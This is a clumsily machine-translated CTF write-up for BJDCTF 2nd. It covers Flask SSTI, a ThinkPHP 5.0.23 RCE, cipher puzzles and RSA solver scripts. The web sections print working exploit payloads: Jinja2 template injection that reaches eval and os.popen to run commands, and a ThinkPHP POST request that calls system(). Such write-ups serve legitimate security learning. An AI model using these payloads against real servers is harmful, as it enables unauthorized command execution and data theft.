BJDCTF 2nd WP
introduction
- Because pro forma, so not much time to do, and it is also a dish, so we did a few questions, here to share it ~ O Hi ( ¯ ▽ ¯ ) bu
[BJDCTF 2nd]fake google
Knowledge Point: SSTI
- The recently trained more, and so is made out of first
Web
, or testflask
framessti
, and did not do much now, is in the final readingflag
time some little routine, tobase64
look to read the file - I use
warnings.catch_warnings
carried eval command is executed, the most commonly usedDoes not seem to find, so look for this - Or the use of first
{{[].__class__.__mro__[1].__subclasses__()}}
obtaining sub-class base class, and then directlyctrl+F
to find ways to use the
found, the discovery can not be used directlyindex()
to find an index, so get out of the copy whose index was found to be 169, then
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}
discovered the successful implementation
- The rest is the command execution, directory traversal, read
flag
, say what this is, readflag
time, read the contents of the file has been filtered, sobase64
it reads
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("echo
cat / flag| base64").read()')}}
- Finally decode what you can get flag
[BJDCTF 2nd]old-hack
Knowledge Point: ThinkPHP5.0.23 remote RCE
- This question has been prompted Home, displayed
Powered by THINKPHP5
, directly associated withtp5
vulnerabilities, direct searchexp
play can be
# ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
The successful implementation of the remaining flag can be read directly under the root directory
[BJDCTF 2nd] old illiterate
Knowledge Point: brain-dong
- This problem it is added to the brain when the pit hole, directly to the text search, read the alphabet discovered clues, finally pay attention when the flag words deleted braces
flag: BJD {Zhe Jiu raincoat embroidery Lai Copernicium Zhijie pride shad Ba}
[BJDCTF 2nd]cat_flag
Knowledge point: Binary string
- I did not react, then tried to have the chicken as 0, no chicken is denoted by 1, into 01 binary string, then transferred to ASCII code
[BJDCTF 2nd] spirit proficiency in -y1ng
Knowledge Point: variant pigpen cipher
- Variant pigpen cipher, looking at the code table against the change just fine
[BJDCTF 2nd] Yan Yan Yan language -y1ng
Knowledge Point: Hex, Virginia password
- First turn the hex string, then Virginia decryption key is yanzi
[BJDCTF 2nd]Y1nglish-y1ng
Knowledge Point: Replace password
- Direct online decryption, flag not found, the topic and people release last hint, said the word should correct the error committed, then find the last word should be Cr4ck
[BJDCTF 2nd]rsa0
Knowledge: Basic RSA routines, junior high school mathematics
- Substitution equal amounts, the known p + q, pq we need to convert and phi n, and the inverse element d, and finally to solve m
- exp:
# -*- coding:utf-8 -*-
# Author : Konmu
# rsa0
import gmpy2
from Crypto.Util.number import *
#a=p+q b=p-q
a=17162353559144679042138764130392599487619616736304807356650753313511074468547740997240459020330637407607018451370757739841162760390979956823381951345720928
b=2157944102411263994709908806124613607462762078172843352748093273937884682449698667594757978254948952712563313245682739933249064978139449404711197573108846
c=45301241949589301995180160804303973330820405560962297548184980689249607707456658111351805771592837881785351326731109851752124118781776273507359216672384415019593182742168977641581393719509221130849808495779942628017133428896872236441436256500653209906562574669595813780702154561337014309513479940699909759454
e=13881611
n=(a**2-b**2) //4
phi=n-a+1
d=int(gmpy2.invert(e,phi))
m=pow(c,d,n)
print(long_to_bytes(m))
[BJDCTF 2nd]rsa1
Knowledge Point: ditto
- It is still the same amount of substitution
- exp:
# -*- coding:utf-8 -*-
# Author : Konmu
# rsa1
from gmpy2 import iroot,invert
from Crypto.Util.number import *
#p**2+q**2=a
a=230282632694523225937051344416173208141003770756289612804807217657804068791542651564838194212104676551997764018460879226166807005433546876007288091996196539309119708193341213288590014759087592722749150747027103386853090111834756105787095305838589646731702172385691220203268855509181738201501713929481838642498
#p-q=b
b=-4900116095386312405990409603053751102044890401512310635193158977344509279780138297206939893571426574257123980641762453196916366832983541826491201092272814
c=57305478781873469701906886706515374864936174293678370148185292603092343152208523838764818066602190494238364695329068029056956741411335604426893391963871703874286120587046383783936896139251516197205626486457338063805605931966769630762887820549045989322171833789694041829203743398401975653722227935420397574254
e=8671291
n=(b**2-a)//(-2)
temp=2*n+a
temp_1=iroot(temp,2)
#temp_1=20893877754997573728203567845738001284961182394065350971204621396499968057878195283639697317876340959595444095705767445958979789899779232673349184190305080
print(temp_1)
phi=n-temp_1+1
d=int(invert(e,phi))
m=pow(c,d,n)
print(long_to_bytes(m))
to sum up
- Originally intended to take this opportunity to practice what web, but found himself still tcl, and other follow-up after the official wp routines to learn about some of the web